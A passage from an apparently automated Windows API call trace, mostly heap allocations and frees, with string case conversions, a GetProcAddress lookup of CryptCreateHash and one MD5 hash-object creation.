dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0105.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0105.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0105.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0105.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0105.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0105.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0105.535] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0105.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0105.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0105.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9e50 [0105.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0105.535] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0105.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0105.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0105.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0105.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0105.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0105.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0105.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0105.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0105.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0105.535] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0105.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0105.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0105.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0105.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0105.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0105.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0105.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0105.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0105.535] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0105.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0105.536] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0105.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0105.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0105.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0105.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0105.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0105.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0105.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0105.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0105.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0105.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0105.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0105.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0105.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0105.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0105.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0105.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0105.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0105.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0105.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0105.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0105.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0105.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0105.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0105.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0105.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0105.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0105.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0105.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0105.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0105.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0105.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0105.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0105.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0105.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0105.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0105.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0105.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0105.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0105.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0105.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0105.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0105.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0105.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0105.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0105.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0105.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0105.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0105.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0105.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0105.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0105.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0105.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0105.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0105.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0105.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0105.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0105.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0105.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0105.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0105.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0105.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0105.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0105.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0105.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0105.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0105.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0105.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0105.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0105.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0105.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0105.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0105.538] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0105.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0105.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0105.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0105.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0105.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0105.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0105.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0105.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0105.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0105.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0105.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0105.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0105.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0105.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0105.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0105.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0105.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0105.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0105.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0105.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0105.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0105.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0105.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0105.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0105.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0105.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0105.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0105.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0105.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0105.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0105.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0105.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0105.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0105.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0105.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0105.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0105.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0105.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0105.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0105.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0105.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0105.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0105.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0105.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0105.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0105.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0105.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0105.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0105.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0105.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0105.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0105.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0105.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0105.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0105.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0105.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0105.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0105.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0105.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0105.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9d90, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0105.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0105.540] GetProcAddress (hModule=0x76390000, lpProcName="CryptCreateHash") returned 0x763aeed0 [0105.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0105.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0105.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6e80 [0105.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0105.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0105.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0105.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0105.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0105.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0105.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0105.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0105.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0105.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0105.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0105.541] CryptCreateHash (in: hProv=0x9bee68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0105.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0105.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0105.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0105.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0105.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0105.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0105.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0105.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0105.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0105.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0105.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0105.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0105.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0105.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0105.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0105.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0105.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0105.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0105.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0105.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0105.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0105.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0105.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0105.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0105.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0105.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0105.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0105.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0105.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0105.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0105.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0105.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0105.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0105.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0105.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0105.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0105.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0105.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0105.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0105.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0105.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0105.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0105.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0105.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0105.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0105.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0105.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0105.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0105.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0105.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 